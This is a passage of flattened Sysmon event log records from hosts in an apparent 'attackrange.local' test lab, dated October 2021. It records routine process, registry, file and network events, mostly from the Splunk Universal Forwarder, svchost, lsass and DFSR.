Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.361{58E9C193-B4F8-615A-5D02-00000000FC01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.300{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFAF2A588CFE81820DE0C8DF50646115,SHA256=06665637ACF5FBDC8AC6510AB80897B9BAC335FF4B23DEB84736D1E7D3E1C2BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.312{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51912-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000107514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.312{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51912-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x800000000000000083478Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:59.611{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50171-false10.0.1.12-8000- 23542300x800000000000000083477Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:01.618{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2A0A1758240C66BC784CCEE41B0E16F,SHA256=72E25C94BD21E93BD1FD2844F78DBC41D31F3CB7ADF764DACC059228F3D1C75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:01.649{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:01.520{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D086ED678E0FF8647021B5D90B6EC0F,SHA256=A2E639F2281415A476836E53D9C0538EE7FBEDB6A075CB99A9FE34B76963D3DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:01.368{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EEB497599AA3A3E4EEBF798F64BEF27,SHA256=8AC77D7E80432B5A4CDD341A3577EC8D6F25E5CE1938EEF36C6CE798ED7B952F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083479Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:02.618{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513BA255D77E654C4D8FF0476DA339E1,SHA256=EB7FD01834C3F5890BFD682AA9B7C297D535321EF1C47E2B282F3E3514FE9EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.531{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5745152B7F0026BD68FE0242138C416,SHA256=6C4E41DA354290F818492093E67EE3A2CFEB52F57DEDDAB6F31DE6FA50EECF10,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000107541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:02.442{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x8000000000000000107540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:02.438{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Config SourceDWORD (0x00000001) 13241300x8000000000000000107539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:02.438{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_4D264F37-7FD1-4957-AA29-D51476710399.XML 10341000x8000000000000000107538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.321{58E9C193-B4FA-615A-5E02-00000000FC01}60404192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000107537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.385{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51913-false10.0.1.12-8000- 10341000x8000000000000000107536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.094{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4FA-615A-5E02-00000000FC01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.090{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.090{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.090{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.090{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.089{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4FA-615A-5E02-00000000FC01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.089{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4FA-615A-5E02-00000000FC01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.088{58E9C193-B4FA-615A-5E02-00000000FC01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083480Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:03.634{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A4907C582A246104874D5670CF95A9,SHA256=CF2A2198030452278DE19C02246892F5308FDC4D41E640A5A5D2FCE11E8EF049,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.921{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4FB-615A-6002-00000000FC01}7308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.920{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.920{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.919{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.919{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.919{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B4FB-615A-6002-00000000FC01}7308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.919{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4FB-615A-6002-00000000FC01}7308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.918{58E9C193-B4FB-615A-6002-00000000FC01}7308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000107558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.685{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51915-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000107557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.685{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51915-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 23542300x8000000000000000107556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.539{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3754351B084D42245469776F458C9A6,SHA256=9F25326E6C5291EF446A44B6ABDB775E8DABDD7B2477983DB24C380AC77CFE98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.660{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51914-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000107554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.660{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51914-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 10341000x8000000000000000107553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.415{58E9C193-B4FB-615A-5F02-00000000FC01}16246556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program 